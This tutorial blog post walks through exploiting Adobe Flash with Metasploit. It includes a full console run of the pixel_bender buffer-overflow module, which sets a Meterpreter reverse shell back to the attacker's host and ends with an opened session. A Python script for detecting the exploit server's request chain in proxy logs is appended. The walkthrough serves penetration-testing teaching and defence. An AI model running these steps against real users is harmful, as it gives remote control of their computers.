05- Metasploit Basics- Attacking Flash

In 03- Metasploit Basics- Attacking the Browser, we saw how to perform attacks against both the Internet Explorer and Firefox browsers, on both Windows and Linux operating systems. Attacks against users of these browsers do not have to be limited to attacking the browser itself. Most browsers use one or more plugins to handle specialized content. Adobe Flash is a plugin that allows certain kinds of active content to be displayed directly in a browser. It has been subject to a number of attacks, and there are a number of Metasploit modules that target it.

As we saw when attacking the browser, it is critical to know something about the target when selecting an exploit; exploits are tailored to particular combinations of browser and Flash version. Moreover, some modules, especially older ones, only work against Windows XP targets. Since Windows XP is now past its end-of-life, we will not discuss modules that only impact Windows XP. Note that this does not mean that the underlying flaw could not be exploited on other machines, only that the Metasploit module is ineffective against non-XP targets.

If you want to test one or more of these modules, remember that you can get copies of old and out-of-date versions of Adobe Flash directly from Adobe.

Metasploit Modules for Adobe Flash

After looking these over, if you ask me which are my favorites, they are clearly Adobe Flash Player Integer Underflow Remote Code Execution and Adobe Flash Player Shader Buffer Overflow. Both are robust and work on a wider range of modern systems. Add the fact that they work reliably on a stock Windows 8 system, and I am sold.

Let’s demonstrate one in action:

msf > use exploit/windows/browser/adobe_flash_pixel_bender_bof
msf exploit(adobe_flash_pixel_bender_bof) > set uripath bob
uripath => bob
msf exploit(adobe_flash_pixel_bender_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(adobe_flash_pixel_bender_bof) > set lhost 10.0.1.26
lhost => 10.0.1.26
msf exploit(adobe_flash_pixel_bender_bof) > show options

Module options (exploit/windows/browser/adobe_flash_pixel_bender_bof):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   Retries     false            no        Allow the browser to retry the module
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     bob              no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     10.0.1.26        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(adobe_flash_pixel_bender_bof) > exploit -j
[*] Exploit running as background job.
msf exploit(adobe_flash_pixel_bender_bof) >
[*] Started reverse handler on 10.0.1.26:4444
[*] Using URL: http://0.0.0.0:8080/bob
[*]  Local IP: http://10.0.1.26:8080/bob
[*] Server started.

msf exploit(adobe_flash_pixel_bender_bof) >
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Gathering target information.
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending response HTML.
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending HTML...
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Request: /bob/dVUXen/MFbh.swf
[*] 10.0.2.2         adobe_flash_pixel_bender_bof - Sending SWF...
[*] Sending stage (770048 bytes) to 10.0.2.2
[*] Meterpreter session 1 opened (10.0.1.26:4444 -> 10.0.2.2:56351) at 2014-06-04 20:19:29 -0400

msf exploit(adobe_flash_pixel_bender_bof) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter x86/win32  APOLLO\zathras @ APOLLO  10.0.1.26:4444 -> 10.0.2.2:56351 (10.0.2.8)

msf exploit(adobe_flash_pixel_bender_bof) >

The process is the same as what we saw for browser attacks. In this case I updated the URI (who would think "bob" would be malicious ☺; besides, it is easier to type). I again used a reverse meterpreter shell for the payload, with the listening host set to the IP address of my attack system. Automatic targeting works well for this module. Run the exploit, and get the user to visit the web page. The shell pops quite quickly.
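From the defender's side, the server log above shows a recognizable chain: the victim fetched the landing page (/bob), then a short random sub-directory (/bob/dVUXen/), then a .swf from inside it, all within seconds and from a non-standard port (8080). The following is an added example, not code from the original post or from Metasploit, that flags that chain in a constructed proxy log; the log format, client addresses and the benign intranet entries are assumptions for the demonstration.

```python
"""Flag the landing-page -> random-dir -> .swf request chain produced by a
Metasploit browser-exploit server (as seen in the pixel_bender run above)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed proxy log lines: "<unix_ts> <client> <method> <url> <status>".
# The first three mirror the page's run; the last two are benign Flash use.
SAMPLE_LOG = """\
1401927560 10.0.2.2 GET http://10.0.1.26:8080/bob 200
1401927561 10.0.2.2 GET http://10.0.1.26:8080/bob/dVUXen/ 200
1401927562 10.0.2.2 GET http://10.0.1.26:8080/bob/dVUXen/MFbh.swf 200
1401927570 10.0.2.5 GET http://intranet.example/news/index.html 200
1401927571 10.0.2.5 GET http://intranet.example/news/banner.swf 200
"""

LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\S+) (\d{3})$")
WINDOW = 30  # max seconds between the landing page and the SWF fetch

def parse(log):
    """Yield (ts, client, host, path) for each well-formed log line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, _method, url, _status = m.groups()
        u = urlsplit(url)
        yield int(ts), client, u.netloc, u.path

def flag_swf_chains(log, window=WINDOW):
    """Return (client, host, swf_path) for every .swf the client fetched
    shortly after requesting both its directory and that directory's parent
    on the same host, i.e. the exploit server's three-step chain."""
    seen = defaultdict(set)  # (client, host) -> {(ts, path), ...}
    hits = []
    for ts, client, host, path in parse(log):
        key = (client, host)
        if path.lower().endswith(".swf"):
            directory = path.rsplit("/", 1)[0] + "/"                 # /bob/dVUXen/
            parent = directory.rstrip("/").rsplit("/", 1)[0] or "/"  # /bob
            recent = {p for t, p in seen[key] if ts - t <= window}
            if directory in recent and (parent in recent or parent + "/" in recent):
                hits.append((client, host, path))
        seen[key].add((ts, path))
    return hits

if __name__ == "__main__":
    for hit in flag_swf_chains(SAMPLE_LOG):
        print("suspicious exploit-server chain:", hit)
```

The benign intranet lines are not flagged because the page fetches its banner.swf directly, with no intermediate random-directory request; a real deployment would pair this with the port check (8080 here, the module's SRVPORT default) and the follow-on outbound connection to LPORT 4444.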
